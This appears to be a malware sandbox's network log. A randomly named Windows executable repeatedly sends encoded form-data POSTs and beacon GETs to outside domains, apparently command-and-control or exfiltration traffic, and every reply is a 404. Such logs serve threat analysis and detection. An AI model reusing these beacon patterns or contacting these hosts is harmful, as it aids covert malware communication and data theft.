                                                                                                            Nov 22, 2024 07:56:04.998981953 CET | 1656 | OUT | POST /11t3/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.smartcongress.net/11t3/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 34 46 70 4d 50 6e 4b 56 65 6b 44 42 33 64 36 50 65 75 62 4a 78 46 43 4b 78 65 76 45 73 31 4a 78 48 61 61 70 32 63 43 34 59 41 55 2f 39 72 56 6f 71 63 6e 4d 35 68 38 49 49 42 64 2b 52 2f 74 34 4e 59 67 30 52 45 37 4f 51 66 65 4c 39 57 76 39 4f 61 6a 36 62 41 6b 47 34 56 61 6c 71 30 37 58 33 33 55 6e 38 72 31 6b 72 31 4b 2b 6b 77 67 44 44 59 48 54 44 55 4a 74 6e 6f 41 32 75 42 2f 4c 70 34 78 69 70 50 38 4d 69 50 4e 76 4e 36 62 63 70 47 6a 35 70 74 43 72 79 50 46 37 44 7a 6f 57 6b 38 6c 45 [TRUNCATED]
                                                                                                            Data Ascii: cla= [TRUNCATED]
                                                                                                            Nov 22, 2024 07:56:06.385685921 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:06 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            12 | 192.168.2.5 | 49862 | 146.88.233.115 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:56:07.662118912 CET | 355 | OUT | GET /11t3/?cla=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:56:09.016925097 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:08 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            13 | 192.168.2.5 | 49879 | 194.85.61.76 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:56:15.111445904 CET | 616 | OUT | POST /2pji/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6b 54 42 75 58 44 53 36 2b 69 65 32 56 4f 6b 53 35 33 4b 62 56 55 6b 4e 63 57 52 76 6e 4a 55 76 6a 63 6e 56 7a 63 41 3d
                                                                                                            Data Ascii: cla=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkTBuXDS6+ie2VOkS53KbVUkNcWRvnJUvjcnVzcA=
                                                                                                            Nov 22, 2024 07:56:16.488099098 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:16 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 14  Source IP: 192.168.2.5  Source Port: 49885  Destination IP: 194.85.61.76  Destination Port: 80  PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp: Nov 22, 2024 07:56:17.774687052 CET  Bytes transferred: 636  Direction: OUT
POST /2pji/ HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.mrpokrovskii.pro
Cache-Control: max-age=0
Content-Length: 224
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.mrpokrovskii.pro/2pji/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Raw: 63 6c 61 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 49 31 4d 46 5a 59 32 35 31 47 35 2f 33 6c 74 4c 56 65 71 53 4d 53 43 34 49 46 6a 69 59 34 52 4c 33 66 44 66 41 73
Data Ascii: cla=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0I1MFZY251G5/3ltLVeqSMSC4IFjiY4RL3fDfAs

Timestamp: Nov 22, 2024 07:56:19.223676920 CET  Bytes transferred: 691  Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:56:18 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 15  Source IP: 192.168.2.5  Source Port: 49891  Destination IP: 194.85.61.76  Destination Port: 80  PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp: Nov 22, 2024 07:56:20.439014912 CET  Bytes transferred: 1653  Direction: OUT
POST /2pji/ HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.mrpokrovskii.pro
Cache-Control: max-age=0
Content-Length: 1240
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.mrpokrovskii.pro/2pji/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Raw: 63 6c 61 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 59 45 70 7a 78 66 74 37 62 62 6d 78 38 66 51 34 67 61 4a 41 44 4d 4f 64 78 65 59 46 4c 62 43 77 32 6e 6c 63 41 36 59 58 45 53 77 54 52 70 2f 66 59 56 39 33 4b 44 2f 6d 78 35 63 64 48 47 6a 38 34 66 56 2b 50 72 42 45 31 39 61 31 70 31 57 73 71 77 44 4f 30 61 2f 49 6a 2f 55 38 43 45 44 50 59 41 41 62 38 36 49 63 58 39 77 68 4b 4a 56 48 4d 2b 2b 56 50 6e 68 51 4a 54 4b 79 76 47 75 6b 47 59 63 4f 31 6a 68 6c 43 53 61 46 68 56 4d 6b 42 49 6f 63 41 72 79 4e 33 6d 75 5a 39 44 77 68 38 6b 49 64 45 33 71 69 6c 31 47 76 44 72 46 71 46 73 46 56 66 6a 37 31 45 52 6a 4f 2f 37 35 4a 6d 2b 37 51 6a 75 71 42 55 38 6d 57 44 42 66 6f 4f 53 79 6f 36 73 31 4f 56 71 70 2b 4c 6b 49 52 6d 76 65 45 45 74 6c 74 38 36 6e 55 6c 53 41 51 34 62 4d 41 7a 42 6e 7a 56 48 2b 59 47 35 4c 76 31 42 38 6f 52 50 50 45 67 6a 77 6e 59 45 34 5a 69 41 66 30 42 6e 59 38 71 48 2b 4d 6a 6d 72 32 34 6a 68 55 [TRUNCATED]
Data Ascii: cla=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRYEpzxft7bbmx8fQ4gaJADMOdxeYFLbCw2nlcA6YXESwTRp/fYV93KD/mx5cdHGj84fV+PrBE19a1p1WsqwDO0a/Ij/U8CEDPYAAb86IcX9whKJVHM++VPnhQJTKyvGukGYcO1jhlCSaFhVMkBIocAryN3muZ9Dwh8kIdE3qil1GvDrFqFsFVfj71ERjO/75Jm+7QjuqBU8mWDBfoOSyo6s1OVqp+LkIRmveEEtlt86nUlSAQ4bMAzBnzVH+YG5Lv1B8oRPPEgjwnYE4ZiAf0BnY8qH+Mjmr24jhUPBnSe98dYjBDRLIWQWYGD9x6tkM1XYXQQNRnTdnF0ufh7vZaySS68XQbVSccGhyGq8zb0CyRR4ks1Z7aIhPt4ic+I7IyouMyL4An8vU7Ks3PJ65DBjEbpph5A8lJuyY09M4MHbInnUfwUk+Ah9bUGZIg1XEuvC/4baPhV5QBcrgXAYI3HMXzISKUii/KvK2krlHYR91yNC46+X7YkVT2iVQyCDJriRy0750uTIZ2fgBxr72vLBUIdsgBmyj6/vY0ftERC4N4gKWYHDrDsZLBY4m+FlrJ8AyuSnXD5Xw94QGhLxly3OBj1Sz8AWCcR/TnTISR7V3Vr3lbs11uNrWIF0X5skr42UDEarlYfTEzuABugJCJUZ8em68ryHs/NFl6pIQy1pD96eQO3U4PVTfBVluBM66aZ8l//ITGc2VDawlnSA2Mtg5DyA2zkv00oWMZvrYqoYpkH/NwtXPHHxJK7kIfIqEV5oW42zp1bbioz88ubKoHcMUPxoDQQwuPQbbAn740S3GwCZlEbRZe0cDqPAeX4ZoicZh9YQsWQUinWWqZBvAn1AkxfE5MlwKm2EIybPOwIIgQHbk3m8FYZA3/k52EBhBdp5Bn0KzEKassnWbFvZ0anOVej8sPfSf049QiAnKAbJDYD2UWa0Q1ilgzIlZmLlJmzVUM0z [TRUNCATED]

Timestamp: Nov 22, 2024 07:56:21.825508118 CET  Bytes transferred: 691  Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:56:21 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 16  Source IP: 192.168.2.5  Source Port: 49899  Destination IP: 194.85.61.76  Destination Port: 80  PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp: Nov 22, 2024 07:56:23.102030039 CET  Bytes transferred: 354  Direction: OUT
GET /2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuX HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)

Timestamp: Nov 22, 2024 07:56:24.521514893 CET  Bytes transferred: 691  Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:56:24 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 17  Source IP: 192.168.2.5  Source Port: 49918  Destination IP: 47.76.213.197  Destination Port: 80  PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp: Nov 22, 2024 07:56:30.787024021 CET  Bytes transferred: 598  Direction: OUT
POST /egqi/ HTTP/1.1
Host: www.ytsd88.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ytsd88.top
Cache-Control: max-age=0
Content-Length: 204
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ytsd88.top/egqi/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Raw: 63 6c 61 3d 57 35 66 78 66 53 66 32 68 6a 52 31 47 66 48 6b 47 51 2f 46 49 44 64 32 30 53 31 52 50 53 4a 76 4d 48 66 47 35 31 45 38 42 6d 36 4d 4b 79 56 50 42 5a 42 69 48 56 6c 58 37 52 6e 6f 4c 36 62 58 55 35 51 51 4c 77 56 46 33 46 4f 41 32 43 47 51 41 65 63 61 6b 74 64 33 35 4b 52 39 37 63 36 38 59 6c 5a 30 6c 7a 62 38 35 2b 59 71 6c 43 4b 58 39 35 68 63 74 2f 30 65 2f 6a 66 57 64 43 38 41 4a 32 79 37 31 2f 4e 34 67 51 53 44 39 76 52 5a 46 65 6b 78 71 42 74 55 56 77 72 62 32 46 4c 65 43 38 4a 68 7a 61 49 59 68 42 32 68 73 49 36 55 62 32 50 75 57 6f 4a 6d 7a 4c 38 45 75 47 57 4a 7a 57 74 76 2f 67 30 3d
Data Ascii: cla=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeC8JhzaIYhB2hsI6Ub2PuWoJmzL8EuGWJzWtv/g0=

Timestamp: Nov 22, 2024 07:56:32.406029940 CET  Bytes transferred: 574  Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:56:32 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank">堡塔 ()</a></div></body></html>


